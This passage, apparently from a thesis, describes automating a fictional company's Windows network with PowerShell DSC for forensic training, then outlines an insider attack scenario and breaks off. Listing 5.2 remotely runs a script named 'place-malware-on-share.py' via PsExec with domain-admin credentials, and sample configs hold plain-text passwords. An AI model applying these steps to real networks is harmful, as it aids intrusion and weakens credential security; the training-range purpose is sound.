Step 7: Download the files required for installation from the shared storage. Install Microsoft Exchange Server from our authoring node.

Step 8: Configure the workstations. Download and install the office programs that cannot be installed with DSC.

Figure 3.3: Environment deployment process.

4 Building the environment

In this chapter, I will explain the environment building process in depth. We will go through the creation of the particular environment elements and look at the created DSC scripts that semi-automate this process.

Table 4.1: An overview of virtual machines involved in demonstration scenario.

Operating system       Computer Name      Architecture
Windows Server 2016    Primary-DC         64-bit
Windows Server 2016    IIS-Server         64-bit
Windows Server 2016    SQL-Server         64-bit
Windows Server 2016    Exchange-Server    64-bit
Windows 10             JLumen-PC          64-bit
Windows 10             JSmith-PC          64-bit
Windows 10             TDoe-PC            64-bit
Debian 8.0             linux-server       64-bit

4.1 Prerequisites

Let's look at the system and environment prerequisites before proceeding with the installation. We need servers that come with Windows Management Framework 5.1, because this is the version that includes the latest version of Windows PowerShell Desired State Configuration (DSC). The ideal server for us is Windows Server 2016, because it has all the required features available. Of course, some older versions of Microsoft server operating systems could be used as well (Windows Server 2012, Windows Server 2012 R2, etc.); however, an upgrade of Windows Management Framework would be required. For the same reasons, we will use the Windows 10 operating system for the employees' workstations.


For the Linux server, there are almost no restrictions; we just need a Linux distribution that bundles the Apache web server. For our demonstration scenario, we will create the sandbox in KYPO with the nodes listed in Table 4.1. They will all be connected to the same virtual computer network.

4.2 Domain Controller

This server will be our authoring node. The process of converting a server to a DC is known as promotion. A domain controller can be authoritative for one and only one domain; it is not possible to host multiple domains on a single DC. In a real enterprise environment, domains can be created in a series and form a domain tree [4]. In our demonstration scenario, we will have only one domain - starkindustries.com. The starkindustries.com domain then forms the root node of a domain tree. If in the future we wanted a more prominent (worldwide) organization, we could add other domains, for example Europe, Asia and Americas; the names would then be europe.starkindustries.com, asia.starkindustries.com and america.starkindustries.com. Before the promotion of our server to a domain controller, the DNS service should be installed. DNS is an essential prerequisite of Active Directory: it makes it possible for clients in a domain to locate domain controllers, and for the domain controllers that host the directory service to communicate with each other. All the steps mentioned above are automated by Start-NewDomainController.ps1. This script takes two inputs, the path to the configuration data and the path to the configuration script. The only purpose of this script is to combine these two parts and start the configuration process. The script should be run directly on the target node that we want to promote to a DC. This procedure is an exception, because it is the starting point of our environment deployment process; the configuration of all other servers will be performed by the domain controller.


Configuration data

The configuration data file is called NewDomainControllerConfigData.psd1. Depending on the current training scenario, the following parameters can be set in the ScenarioData section:

∙ DomainName - domain name of the new domain controller.

∙ DomainAdminPassword - the password for the Administrator account that is used to install the domain controller.

Configuration script

The configuration script will perform the following actions on the target server:

1. Install the DNS feature.

2. Set preferred DNS address for the specified network interface to 127.0.0.1 (localhost).

3. Install Remote Server Administration Tool.

4. Install Active Directory Domain Services.

5. Create the new Active Directory forest. For this purpose the script uses xADDomain from the xActiveDirectory DSC module.

6. Wait for the creation of the new forest to finish.
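The six steps above as a complete DSC configuration, added here as an example (it is not the thesis' NewDomainController.ps1). The interface alias, the choice of xDnsServerAddress from xNetworking for step 2, the RSAT feature name and the sample data values are my assumptions; DomainName and DomainAdminPassword are read from ScenarioData exactly as the configuration data section describes.

```powershell
# NewDomainController.ps1 (added example mirroring steps 1-6; not the thesis code).
Configuration NewDomainController {
    Import-DscResource -ModuleName PSDesiredStateConfiguration
    Import-DscResource -ModuleName xNetworking        # xDnsServerAddress (assumed choice for step 2)
    Import-DscResource -ModuleName xActiveDirectory   # xADDomain, xWaitForADDomain

    $scenario = $ConfigurationData.ScenarioData
    # Credential built from ScenarioData.DomainAdminPassword (plain text in the data file).
    $adminCred = New-Object System.Management.Automation.PSCredential(
        'Administrator',
        (ConvertTo-SecureString -String $scenario.DomainAdminPassword -AsPlainText -Force))

    Node $AllNodes.NodeName {
        # 1. DNS feature
        WindowsFeature DNS {
            Ensure = 'Present'
            Name   = 'DNS'
        }
        # 2. Preferred DNS server of the chosen interface -> localhost
        xDnsServerAddress LocalDns {
            Address        = '127.0.0.1'
            InterfaceAlias = $Node.InterfaceAlias
            AddressFamily  = 'IPv4'
            DependsOn      = '[WindowsFeature]DNS'
        }
        # 3. Remote Server Administration Tools for AD DS
        WindowsFeature RSAT {
            Ensure = 'Present'
            Name   = 'RSAT-ADDS'
        }
        # 4. Active Directory Domain Services
        WindowsFeature ADDS {
            Ensure = 'Present'
            Name   = 'AD-Domain-Services'
        }
        # 5. Create the forest; the same credential doubles as the DSRM password here.
        xADDomain Forest {
            DomainName                    = $scenario.DomainName
            DomainAdministratorCredential = $adminCred
            SafemodeAdministratorPassword = $adminCred
            DependsOn                     = '[WindowsFeature]ADDS', '[xDnsServerAddress]LocalDns'
        }
        # 6. Block until the new domain answers queries
        xWaitForADDomain DomainReady {
            DomainName           = $scenario.DomainName
            DomainUserCredential = $adminCred
            RetryCount           = 20
            RetryIntervalSec     = 30
            DependsOn            = '[xADDomain]Forest'
        }
    }
}

# Inline stand-in for NewDomainControllerConfigData.psd1 (constructed sample values).
$configData = @{
    AllNodes = @(
        @{
            NodeName                    = 'localhost'   # the script runs on the future DC itself
            InterfaceAlias              = 'Ethernet'    # assumed adapter name
            PsDscAllowPlainTextPassword = $true         # lab only: credential is stored unencrypted in the MOF
        }
    )
    ScenarioData = @{
        DomainName          = 'starkindustries.com'
        DomainAdminPassword = 'Replace-Me-In-ConfigData-1'   # placeholder
    }
}

NewDomainController -ConfigurationData $configData -OutputPath 'C:\DSC\NewDomainController'
Start-DscConfiguration -Path 'C:\DSC\NewDomainController' -Wait -Verbose -Force
```

Two practical points: promotion to a DC needs a reboot, so the LCM on the node should have RebootNodeIfNeeded enabled or the run has to be restarted after a manual reboot; and PsDscAllowPlainTextPassword leaves the domain administrator password readable in the compiled MOF, which is acceptable only in an isolated sandbox like this one (outside it the MOF should be encrypted with a certificate).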

4.2.1 Join nodes to domain

After we have successfully created the Active Directory domain, we should add all the nodes to the domain. This operation can also be done with DSC resources. Adding nodes to the domain is automated by Start-AddToDomain.ps1. This script again takes two files, the configuration data file and the configuration script file. The disadvantage of this script is that it has to be run directly on the target nodes; we cannot push this configuration from our authoring node, because for that action the nodes need to be in the domain already.


Configuration data

The configuration data file is called AddToDomainConfigData.psd1. Depending on the current training scenario, the following parameters can be set in the ScenarioData section:

∙ DomainName - the name of the domain to which we want to join the node.

∙ DomainAdminPassword - password of the domain administrator account.

∙ DnsServerAddress - IP address of the DNS server; the same as the IP address of the Active Directory server.

Configuration script

The configuration script file is named AddToDomain.ps1. The script performs two basic actions: setting the DNS server address and adding the node to the specified domain.

4.2.2 Configuring shared storages

Before pushing the configurations to our target nodes from the Domain Controller, we need to configure shared storages. There are two types of shared storages:

∙ Storage for DSC resources.

∙ Storage for files required during installation.

Shared storage for DSC resources

As mentioned in Section 3.2, push mode requires a copy of each DSC resource module used in our configuration to be available both on the authoring node and on the target nodes. We solve this problem by setting up a file share; using this share, we copy all DSC resources to the target nodes. To automate the share setup, the script Share-Dsc-Resources.ps1 has been created. The script performs the following actions on the node:


∙ Create and share a folder on the C drive. Grant everyone in the domain full access permission to this folder.

∙ Install the DSC modules from the PowerShell repository on the authoring node. Save a copy of each installed DSC module as a ZIP archive in the shared folder.

Once the share is set up, we need to copy the modules to each node in the domain. They are copied to the special PowerShell folder for modules. For this, two files are available:

1. Start-Copy-Resources-To-TargetNodes.ps1: starts the copying process.

2. Copy-Resources-To-Target-Nodes-ConfigData.psd1: configuration data file that contains the list of nodes to which the resources will be copied.
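The share setup and the copy to the target nodes, as one added example covering both scripts described above (it is not the thesis' Share-Dsc-Resources.ps1 or Start-Copy-Resources-To-TargetNodes.ps1). The module list, the share name and the target node names are assumptions; the node names are taken from Table 4.1. It deliberately departs from the text in one respect: instead of full access for everyone in the domain, only Domain Admins may write to the share, because whatever sits in it is later loaded as a DSC module and executed as SYSTEM on every target node.

```powershell
<#
  Added example combining share creation, module publishing and the copy to the
  target nodes. Module names, share name and node list are assumptions.
#>
$ShareName   = 'DscResources'
$SharePath   = 'C:\DscResources'
$Modules     = 'xActiveDirectory', 'xNetworking', 'xComputerManagement',
               'xPSDesiredStateConfiguration', 'xWebAdministration'
$TargetNodes = 'IIS-Server', 'SQL-Server', 'Exchange-Server'   # names from Table 4.1
$Domain      = $env:USERDOMAIN

function Publish-DscResourceShare {
    New-Item -ItemType Directory -Path $SharePath -Force | Out-Null
    if (-not (Get-SmbShare -Name $ShareName -ErrorAction SilentlyContinue)) {
        # Write access limited to Domain Admins; nodes and users only read.
        New-SmbShare -Name $ShareName -Path $SharePath `
            -FullAccess "$Domain\Domain Admins" `
            -ReadAccess "$Domain\Domain Computers", "$Domain\Domain Users" | Out-Null
    }
    foreach ($name in $Modules) {
        # Install from the PowerShell Gallery on the authoring node ...
        Install-Module -Name $name -Scope AllUsers -Force
        $module = Get-Module -ListAvailable -Name $name |
                  Sort-Object Version -Descending | Select-Object -First 1
        # ... and save the versioned module folder as <Name>.zip in the share.
        # Zipping ModuleBase keeps the "<Name>\<Version>\" layout PowerShell expects.
        Compress-Archive -Path $module.ModuleBase `
                         -DestinationPath (Join-Path $SharePath "$name.zip") -Force
    }
}

function Copy-DscResourcesToNodes {
    param([string[]] $Nodes = $TargetNodes)
    foreach ($node in $Nodes) {
        # All-users module path on the node, reached through the administrative share.
        $modulesDir = "\\$node\C$\Program Files\WindowsPowerShell\Modules"
        foreach ($zip in Get-ChildItem -Path $SharePath -Filter '*.zip') {
            Expand-Archive -Path $zip.FullName `
                           -DestinationPath (Join-Path $modulesDir $zip.BaseName) -Force
        }
    }
}

Publish-DscResourceShare
Copy-DscResourcesToNodes
```

Expanding each ZIP into Modules\<Name>\ reproduces the Modules\<Name>\<Version>\ layout that Install-Module created on the authoring node, which is what Import-DscResource looks for on the target.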

Shared storage for installation files

Installation of some services requires additional installation files. Those files may be ISO files (archive files of an installation medium) or executable binary files. We need to ensure the presence of those files in some accessible place. In our case, we put those files on an Apache server that is accessible by each node in our network. Each file has a unique URL and is downloaded to the target node during the installation process. Of course, the network shared storage from the previous step could be used as well; however, to get large files into the KYPO sandbox, an Apache server is a more convenient solution. To automate the installation of the Apache server and the configuration of the shared folder, we can run the simple shell script apache-file-share-install.sh on our Debian server. Once the shared folder is set up, everything we put into /var/www is publicly accessible.

4.3 Internet Information Services (IIS) Server

The installation of Internet Information Services (IIS) on a server is a simple process that does not require any DSC resources. It is basically just the installation of several Windows features. The process of installing the required features is automated by Start-NewIIS-Installation.ps1.

Configuration data

The configuration data file is called NewIISConfigData.psd1. As previously mentioned, the installation process just adds Windows features, so this time there are no parameterizable values in the ScenarioData section. The only variable that needs to be specified in the configuration data file is the name of the target server.

Configuration script

The configuration script is called NewIIS.ps1 and will perform the following actions on a target server:

1. Install the IIS feature.

2. Install ASP.NET.

3. Install the IIS Management Tools.

4.4 Microsoft SQL Server

Most of the configuration options for MSSQL are set or viewed through Microsoft SQL Server Management Studio (SSMS). Besides the SQL engine, we will therefore also install SSMS, which will be used to configure, monitor and administer the SQL server [15]. The installation of the SQL engine and SSMS is automated by Start-NewSQLServer.ps1.

Configuration data

The configuration data file is called NewSQLServerConfigData.psd1. There are no parameterizable values in the ScenarioData section. In the NodeData section, besides the target server name, we need to provide URL links to the SQL Server installation ISO and to the SSMS executable file, together with the Product ID. The Product ID is a required parameter when the Package DSC resource (the resource for installing MSI and executable files) is used. It is a unique identifier of the product being installed; if the Product ID does not correspond to the provided package, the installation fails. A guide on how to obtain the Product ID for a particular package can be found in [16]. The files mentioned above need to be stored on the Apache server in advance.

Configuration script

The configuration script is called NewSQLServer.ps1 and will perform the following actions on a target server:

1. Create a new folder for the SQL installation files (C:\SQLInstallationDirectory).

2. Download SQL Server installation ISO from the shared storage.

3. Download SSMS executable file.

4. Perform required installation steps.
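Steps 1-4 as an added example configuration (not the thesis' NewSQLServer.ps1). The node keys SqlServerIsoUrl, SsmsUrl and SsmsProductId, the use of xRemoteFile for the downloads, and the unattended setup.exe switches for step 4 are my assumptions; the Product ID value is a placeholder standing in for the one obtained as described in [16]. The same download-then-Package pattern applies to the UCMA binary in the Exchange section that follows.

```powershell
# NewSQLServer.ps1 (added example implementing steps 1-4; not the thesis script).
Configuration NewSQLServer {
    Import-DscResource -ModuleName PSDesiredStateConfiguration     # File, Script, Package
    Import-DscResource -ModuleName xPSDesiredStateConfiguration    # xRemoteFile

    $dir = 'C:\SQLInstallationDirectory'

    Node $AllNodes.NodeName {
        # 1. Folder for the installation files
        File InstallDir {
            DestinationPath = $dir
            Type            = 'Directory'
            Ensure          = 'Present'
        }
        # 2./3. Fetch the ISO and the SSMS setup from the Apache share over HTTP
        xRemoteFile SqlIso {
            Uri             = $Node.SqlServerIsoUrl
            DestinationPath = "$dir\SQLServer.iso"
            DependsOn       = '[File]InstallDir'
        }
        xRemoteFile SsmsSetup {
            Uri             = $Node.SsmsUrl
            DestinationPath = "$dir\SSMS-Setup.exe"
            DependsOn       = '[File]InstallDir'
        }
        # 4a. Mount the ISO and run an unattended engine-only install.
        #     TestScript: the default instance service exists, so a re-run is a no-op.
        Script InstallSqlEngine {
            TestScript = { $null -ne (Get-Service -Name 'MSSQLSERVER' -ErrorAction SilentlyContinue) }
            GetScript  = { @{ Result = [string](Get-Service -Name 'MSSQLSERVER' -ErrorAction SilentlyContinue).Status } }
            SetScript  = {
                $iso   = 'C:\SQLInstallationDirectory\SQLServer.iso'
                $img   = Mount-DiskImage -ImagePath $iso -PassThru
                $drive = ($img | Get-Volume).DriveLetter
                & "${drive}:\setup.exe" /Q /ACTION=Install /FEATURES=SQLEngine `
                    /INSTANCENAME=MSSQLSERVER /SQLSYSADMINACCOUNTS="BUILTIN\Administrators" `
                    /IACCEPTSQLSERVERLICENSETERMS
                Dismount-DiskImage -ImagePath $iso
            }
            DependsOn  = '[xRemoteFile]SqlIso'
        }
        # 4b. SSMS through the Package resource. ProductId must be the package's
        #     product code; with a wrong value DSC reports the installation as failed.
        Package Ssms {
            Name      = 'Microsoft SQL Server Management Studio'
            Path      = "$dir\SSMS-Setup.exe"
            ProductId = $Node.SsmsProductId
            Arguments = '/install /quiet /norestart'
            Ensure    = 'Present'
            DependsOn = '[Script]InstallSqlEngine', '[xRemoteFile]SsmsSetup'
        }
    }
}

# Stand-in for NewSQLServerConfigData.psd1 (constructed values).
$configData = @{
    AllNodes = @(
        @{
            NodeName        = 'SQL-Server'
            SqlServerIsoUrl = 'http://linux-server/SQLServer2016.iso'     # constructed URL
            SsmsUrl         = 'http://linux-server/SSMS-Setup-ENU.exe'    # constructed URL
            SsmsProductId   = '{00000000-0000-0000-0000-000000000000}'     # placeholder, obtain as in [16]
        }
    )
    ScenarioData = @{}
}
NewSQLServer -ConfigurationData $configData -OutputPath 'C:\DSC\NewSQLServer'
Start-DscConfiguration -Path 'C:\DSC\NewSQLServer' -Wait -Verbose -Force
```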

4.5 Exchange Server

Before the installation of Exchange, various Windows components need to be installed. I have tested the deployment script with Exchange 2016; all the required prerequisites for this version are listed on the official Microsoft page [17]. The majority of them are Windows features that can be installed from the command line. However, there is also one additional binary file that needs to be downloaded and installed - Microsoft Unified Communications Managed API 4.0 (UCMA) [18]. The installation of all required prerequisites and of the Exchange Mailbox is automated by the script Start-NewExchangeServer.


Configuration data

The configuration data file is called NewExchangeServerConfigData.psd1. Similar to the SQL Server configuration, there are no parameterizable values in the ScenarioData section. Besides the information about the target server in the NodeData section, we need to provide:

∙ URL link to the Exchange installation file.

∙ URL link to the UCMA executable file.

∙ Product ID for UCMA.

The mentioned files should be stored on our Apache server in advance.

Configuration script

The configuration script NewExchangeServer.psd is designed to perform the following actions on a target server:

1. Install the required Windows features listed in the prerequisites.

2. Download and install UCMA.

3. Copy the Exchange files to the local disk.

4. Run the Exchange installation.

4.6 Windows Workstations

We need to have the following software on our workstations:

∙ Chrome Web Browser

∙ Microsoft Outlook 2016

∙ Microsoft Word 2016

Unfortunately, Microsoft Office 2016 cannot be installed using DSC due to license restrictions. The enterprise deployment process is complicated and cannot easily be automated [19]. So for the Office applications we need to get Office 365 Personal and install the individual Office applications on our workstations manually.


For the installation of Chrome I used the MSFT_xChrome DSC resource, which simplifies the installation of this web browser. We just need to specify the language of the browser; the module then downloads the latest version of the browser from the official Google page and installs it.

Configuration data

The configuration data file is called NewWorkStationConfigData.psd1. In the AllNodes section we can specify all nodes on which we want to install the software. Because the demonstration scenario involves three workstations, we install the required software on all three computers simultaneously. In ScenarioData we need to specify the language of the browser to be installed.

Configuration script

The configuration script is named NewWorkStation.ps1 and just uses the MSFT_xChrome DSC resource to install the Google Chrome web browser.


5 Populating environment with the scenario data

In this chapter, we introduce the process of populating our environment with data, which makes the training environment look more realistic. Firstly, we add users to our domain. Then we deploy a web application and fill the database server with application data. Finally, with Python scripts, we simulate the users' behavior in the systems.

5.1 Adding users, groups, and organizational units

Companies have a hierarchical structure within their domains, and users are divided into groups and organizational units (OU). Placing users in such a hierarchy allows permissions to be assigned and rights to be delegated effectively inside the organization. A clear distinction between groups and OUs is important: groups are designed to grant or restrict access to company resources, whereas organizational units are intended to control objects (using group policy settings). An OU is useful when we want to delegate admin tasks to specific users, for example the ability to reset passwords for other employees [4]. In our demonstration scenario, the AD groups and organizational units mirror the company hierarchy as shown in Figure 5.1. The process of adding users and dividing them into groups and organizational units is automated by Start-NewDomainController-Installation.ps1. Adding users and groups is automated by the Start-AddGroupsAndUsers.ps1 script. The script should be run directly on a domain controller.

Configuration data

The configuration data file is called AddGroupsAndUsersConfigData.psd1. The following parameters can be set in the ScenarioData section:

∙ DomainName - name of the domain to which the users will be added.


Figure 5.1: Organizational units and groups structure.

∙ AdGroups - list of groups that will be created.

∙ OrganizationalUnits - list of organizational units that will be created.

∙ AdUsers - array of user objects (hashtables) that will be created in the domain. Each user has the following parameters:

  – FirstName - first name of the user that will be added.

  – LastName - last name of the user that will be added.

  – Department - organizational unit to which the user belongs.

  – Group - array of user objects (hashtables) that will be created in the domain.

  – Title - job title of the user. This parameter is not mandatory.

  – Password - password for the account.


Please be aware that usernames must be unique throughout each domain. The username will be created as a concatenation of the first name and last name.

Configuration script

The configuration script is called AddGroupsAndUsers.psd1. It uses the xActiveDirectory DSC module and performs the following actions on a target server:

1. Create the organizational units. For this purpose the script uses xADOrganizationalUnit.

2. Create the users and divide them into organizational units. This is done with xADUser.

3. Create the groups and add the users to these groups.
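Steps 1-3 as an added example configuration driven by the ScenarioData layout described above (it is not the thesis' AddGroupsAndUsers script). Usernames are FirstName concatenated with LastName, as the text states; the OU placement by Department, the Global/Security group settings, the DomainAdminPassword key in ScenarioData and the sample users (the scenario's John Smith, Travis Doe and Jim Lumen with constructed departments, groups and passwords) are my assumptions.

```powershell
# AddGroupsAndUsers.ps1 (added example implementing steps 1-3; not the thesis script).
Configuration AddGroupsAndUsers {
    Import-DscResource -ModuleName xActiveDirectory   # xADOrganizationalUnit, xADUser, xADGroup

    $scenario  = $ConfigurationData.ScenarioData
    $domain    = $scenario.DomainName
    # starkindustries.com -> DC=starkindustries,DC=com
    $domainDn  = ($domain.Split('.') | ForEach-Object { "DC=$_" }) -join ','
    $adminCred = New-Object System.Management.Automation.PSCredential(
        "$domain\Administrator",
        (ConvertTo-SecureString -String $scenario.DomainAdminPassword -AsPlainText -Force))
    # Every user resource, so groups can wait for all accounts before adding members.
    $allUsers  = @($scenario.AdUsers | ForEach-Object { "[xADUser]User_$($_.FirstName)$($_.LastName)" })

    Node $AllNodes.NodeName {
        # 1. Organizational units directly under the domain root
        foreach ($ou in $scenario.OrganizationalUnits) {
            xADOrganizationalUnit "OU_$ou" {
                Name                            = $ou
                Path                            = $domainDn
                Ensure                          = 'Present'
                ProtectedFromAccidentalDeletion = $false   # lab: allows teardown between trainings
                Credential                      = $adminCred
            }
        }
        # 2. Users, each placed in the OU named by its Department
        foreach ($u in $scenario.AdUsers) {
            $userName = "$($u.FirstName)$($u.LastName)"      # username = first name + last name
            $title    = if ($u.Title) { $u.Title } else { '' } # Title is optional
            $userCred = New-Object System.Management.Automation.PSCredential(
                $userName, (ConvertTo-SecureString -String $u.Password -AsPlainText -Force))
            xADUser "User_$userName" {
                DomainName                    = $domain
                UserName                      = $userName
                GivenName                     = $u.FirstName
                Surname                       = $u.LastName
                JobTitle                      = $title
                Department                    = $u.Department
                Path                          = "OU=$($u.Department),$domainDn"
                Password                      = $userCred
                DomainAdministratorCredential = $adminCred
                Ensure                        = 'Present'
                DependsOn                     = "[xADOrganizationalUnit]OU_$($u.Department)"
            }
        }
        # 3. Groups, with members derived from each user's Group list
        foreach ($g in $scenario.AdGroups) {
            $members = @($scenario.AdUsers |
                Where-Object { $_.Group -contains $g } |
                ForEach-Object { "$($_.FirstName)$($_.LastName)" })
            xADGroup "Group_$g" {
                GroupName        = $g
                GroupScope       = 'Global'
                Category         = 'Security'
                MembersToInclude = $members
                Credential       = $adminCred
                Ensure           = 'Present'
                DependsOn        = $allUsers
            }
        }
    }
}

# Stand-in for AddGroupsAndUsersConfigData.psd1 (constructed sample values).
$configData = @{
    AllNodes     = @(@{ NodeName = 'localhost'; PsDscAllowPlainTextPassword = $true })   # run on the DC
    ScenarioData = @{
        DomainName          = 'starkindustries.com'
        DomainAdminPassword = 'Replace-Me-1'          # placeholder
        OrganizationalUnits = 'Executive', 'IT', 'Sales'
        AdGroups            = 'Management', 'IT-Admins', 'Staff'
        AdUsers             = @(
            @{ FirstName = 'John';   LastName = 'Smith'; Department = 'Executive'; Group = @('Management', 'Staff'); Title = 'CEO';                     Password = 'Replace-Me-2' }
            @{ FirstName = 'Travis'; LastName = 'Doe';   Department = 'IT';        Group = @('IT-Admins', 'Staff');  Title = 'IT System Administrator'; Password = 'Replace-Me-3' }
            @{ FirstName = 'Jim';    LastName = 'Lumen'; Department = 'Sales';     Group = @('Staff');                                                   Password = 'Replace-Me-4' }
        )
    }
}
AddGroupsAndUsers -ConfigurationData $configData -OutputPath 'C:\DSC\AddGroupsAndUsers'
Start-DscConfiguration -Path 'C:\DSC\AddGroupsAndUsers' -Wait -Verbose -Force
```

Because the resource names are derived from the data (OU_<name>, User_<name>, Group_<name>), a duplicate username in AdUsers makes the configuration fail at compile time with a duplicate-resource error rather than silently creating one account for two people, which enforces the uniqueness requirement mentioned above.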

5.2 Deploying web application

Now that Internet Information Services and Microsoft SQL Server are running, we can proceed with deploying the web application. The web application deployment process is automated by the Start-DeployWebSite.ps1 script. In the configuration data, we need to provide the URL of the website package and the website name.

Configuration data

The configuration data file is called DeployWebSiteConfigData.psd1. Besides the target server name, we need to provide the URL of the website package and the website name:

1. WebSitePackage - URL of the website files in a ZIP archive.

2. WebSiteName - an easily recognizable website name.

Configuration script

The configuration script is called DeployWebSite.ps1 and will perform the following actions on a target server:


1. Stop the default website (wwwroot).

2. Create the website home directory in the default Inetpub folder.

3. Extract the website files to the newly created home directory.

4. Create the new website and set the path to the website files.

5. Start the website.
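Steps 1-5 as an added example configuration (not the thesis' DeployWebSite.ps1). It takes WebSitePackage and WebSiteName from ScenarioData as described; the resources chosen for each step (xWebsite, File, xRemoteFile, Archive), the port 80 binding and the sample URL are my assumptions.

```powershell
# DeployWebSite.ps1 (added example implementing steps 1-5; not the thesis script).
Configuration DeployWebSite {
    Import-DscResource -ModuleName PSDesiredStateConfiguration    # File, Archive
    Import-DscResource -ModuleName xPSDesiredStateConfiguration   # xRemoteFile
    Import-DscResource -ModuleName xWebAdministration             # xWebsite

    $site     = $ConfigurationData.ScenarioData
    $siteRoot = "C:\inetpub\$($site.WebSiteName)"
    $package  = "C:\inetpub\$($site.WebSiteName).zip"

    Node $AllNodes.NodeName {
        # 1. Stop the default site so that port 80 is free for ours
        xWebsite DefaultSite {
            Name         = 'Default Web Site'
            PhysicalPath = 'C:\inetpub\wwwroot'
            State        = 'Stopped'
            Ensure       = 'Present'
        }
        # 2. Home directory under Inetpub
        File SiteRoot {
            DestinationPath = $siteRoot
            Type            = 'Directory'
            Ensure          = 'Present'
        }
        # Download the ZIP from the Apache share over HTTP ...
        xRemoteFile SitePackage {
            Uri             = $site.WebSitePackage
            DestinationPath = $package
        }
        # 3. ... and extract it into the home directory
        Archive SiteFiles {
            Path        = $package
            Destination = $siteRoot
            Ensure      = 'Present'
            DependsOn   = '[xRemoteFile]SitePackage', '[File]SiteRoot'
        }
        # 4./5. Create the site bound to port 80 and start it
        xWebsite Site {
            Name         = $site.WebSiteName
            PhysicalPath = $siteRoot
            State        = 'Started'
            Ensure       = 'Present'
            BindingInfo  = MSFT_xWebBindingInformation { Protocol = 'HTTP'; Port = 80 }
            DependsOn    = '[Archive]SiteFiles', '[xWebsite]DefaultSite'
        }
    }
}

# Stand-in for DeployWebSiteConfigData.psd1 (constructed sample values).
$configData = @{
    AllNodes     = @(@{ NodeName = 'IIS-Server' })
    ScenarioData = @{
        WebSitePackage = 'http://linux-server/website.zip'   # constructed URL
        WebSiteName    = 'ecommerce'
    }
}
DeployWebSite -ConfigurationData $configData -OutputPath 'C:\DSC\DeployWebSite'
Start-DscConfiguration -Path 'C:\DSC\DeployWebSite' -Wait -Verbose -Force
```

The ordering matters: the new site depends on the default site being stopped, so the port 80 binding never clashes, and on the archive being extracted, so IIS never serves an empty directory during the first run.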

Demonstration scenario website

Of course, creating a new ASP.NET application with a database and users from scratch would be time-consuming. Therefore the best solution is to use an existing web application that is popular in the business segment. For the purposes of this thesis I used nopCommerce1. nopCommerce is the leading ASP.NET-based open-source eCommerce platform, and it ideally fits our needs. Since it is based on ASP.NET, it runs on an IIS server and uses an MS SQL Server backend database. It is available under the GNU General Public License v3, and many well-known web stores have been built on it. The installation process is simple and consists of two steps. The first step is done by our automation; the second should be performed manually, directly in the nopCommerce application wizard.

1. Website deployment

We will use nopCommerce version 3.80, which is available on GitHub [20]. We need to save the website content as a ZIP archive on our Apache shared storage. Listing 5.1 shows an example of the ScenarioData section in the configuration data file.

Listing 5.1: Scenario data section for nopCommerce website deployment.

    ScenarioData = @{
        WebSitePackage = "http://147.251.253.164/nopCommerce_3.80_NoSource.zip"
        WebSiteName    = "ecommerce"
    }

1. https://www.nopcommerce.com


When the DSC configuration process is finished, we have a running nopCommerce web application.

2. Website configuration

When we open a browser and go to the IP address of our IIS server, we are redirected to the installation page (Figure 5.2).

Figure 5.2: nopCommerce Installation page.

In the Store information area we need to define:

∙ Admin user email

∙ Admin user password

We will check the Create sample data check-box. It creates sample data in our MS SQL database. In the Database information area we need to define information about our MS SQL Server:


∙ SQL Server name

∙ Database name

When the setup process is complete, our new site's home page is displayed, and our database is filled with the sample data. These installation steps are described in more detail in the nopCommerce guide [21].

5.3 Simulation of users actions

Challenges

Simulating user activity in the systems is not trivial. It is not enough just to perform a certain task; we need to do it the way a normal user does, because only this approach generates truly realistic forensic traces. As an example, let's take the case of reading emails. The easiest way is to connect to our Exchange mailbox with a Python script and mark all messages as read; however, that is not how a user does it. The user first opens the Outlook application and then reads the emails one by one.

Developed solution

To automate the users' activities (the victim's as well as the attacker's), I use the Python library pywinauto [22]. It is a set of Python modules that automate the GUI: it allows sending mouse and keyboard actions to Windows dialogs and controls. Using this library, I have created my own Python package called forensic_bot, which contains functions to simulate the particular user activities that we need to reproduce in our environment. The package contains more than 9 functions to simulate user activities. Examples of activities that are automated with a function:

∙ Browse particular web pages through Chrome Web browser.

∙ Send a random email to the list of recipients. To generate random content of the emails loremipsum python package is used.


∙ Search suspicious queries with Google and open the most relevant result. A typical activity of script kiddies when they are looking for information related to an attack (e.g. "script for dropping MS SQL database").

This approach with the created package and functions has multiple benefits. We can simply import the package from another Python script and call its functions. Because each function is one particular action, we can use these functions in a loop or build a chain of such actions.

Run Python Scripts Remotely

Of course, we can log in to the particular computer and run the Python script directly, but a better solution is to execute all scripts for all users from the same node (the Domain Controller). This can be done with the tool PsExec2, a tool for remotely executing processes on Windows. Listing 5.2 shows an example of the command that executes a script saved on the shared network storage on the JLumen-PC computer.

Listing 5.2: Remote execution of a Python script.

    PsExec64.exe \\JLumen-PC -i 1 -u STARKINDUSTRIES\Administrator -p Password "C:\Python34\python.exe" "\\SharedFolder\place-malware-on-share.py"

2. https://docs.microsoft.com/en-us/sysinternals/downloads/psexec


6 Security incidents injection

Now that we have a working environment filled with users and data, our goal is to inject attacks. The combination of the environment and the security incidents establishes a compromised infrastructure to study. The attacks produce predefined forensic evidence to be used in the training modules. This chapter shows the process of compromising the target and presents the cyber attacks performed by our insider attacker. We also introduce the scripts that have been created to automate this process and generate forensic artifacts; these artifacts will be analyzed by the participants of our training during the investigation. The order of the scenario attacks is shown in Figure 6.1. As mentioned in Section 2.2, our insider attacker (Jim Lumen) chose two target persons among the employees:

∙ John Smith (CEO) - the person from the executive department; has access to confidential information available only to senior management.

∙ Travis Doe (IT System Administrator) - also a valuable target of opportunity; has administrator privileges to the corporation's services.

Our attacker is motivated by money and wants to get revenge on an old employer. To stay anonymous and not use his work computer for the attacks, he built a remote server in the cloud. He performed three attacks in total:

1. Password guessing attack. This one was unsuccessful. (Number 1 in the Figure 6.1)

2. Phishing attack (Numbers 2, 3 in Figure 6.1)

3. Malware attack (Numbers 4, 5, 6, 7, 8, 9 in Figure 6.1)

After the attacker gained the needed access in the network, he performed two post-exploitation actions: service disruption and data theft.


Figure 6.1: Attacks implemented in our sample Scenario.

To describe the attacks, I mapped them to the "intrusion kill chain" [23] model. This is one of the most popular models used to describe an attacker's actions while attempting to compromise an organization's information system. The model was first introduced in a paper by Lockheed Martin Corporation. It introduces seven phases of an attack:

1. Reconnaissance - research, identification and selection of targets.

2. Weaponization - create a delivery payload.

3. Delivery - deliver the weapon to the target environment.

4. Exploitation - exploit the target (could be the system or the user).

5. Installation - installation of a backdoor to maintain persistence.

6. Command and Control (C2) - establish a channel for the attacker to control the system.

7. Actions on objective - the attacker achieves his original goals.

6.1 Password guessing

